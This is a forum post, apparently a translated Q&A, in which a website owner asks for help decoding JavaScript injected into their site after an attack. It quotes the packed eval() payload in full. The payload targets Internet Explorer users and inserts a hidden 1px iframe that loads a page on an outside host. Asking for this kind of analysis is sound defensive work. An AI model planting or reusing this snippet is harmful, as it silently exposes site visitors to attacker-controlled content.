小编ARa*_*rub的帖子

注入网站的JavaScript代码:你能帮我解密一下吗?

最近我是网络攻击的受害者,它似乎采用了各种PHP服务器变量,然后将它们转发给攻击者网站.(访问者/网站的IP,推荐人,使用者等等)然后它会得到它发送URL请求的文件,并将它回显(来源).

我知道你收到了很多这样的请求(主要是作为穷人的XSS尝试),但我非常感谢这里的一些帮助,因为我对JS没有多少经验.我花了几个小时的PHP解密来计算它做了什么,并且在传递了一些虚拟信息后,它返回了这个(它被回复到源代码中)

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))
Run Code Online (Sandbox Code Playgroud)

感谢您对此事的时间和耐心.

javascript malware

3
推荐指数
1
解决办法
1万
查看次数

标签 统计

javascript ×1

malware ×1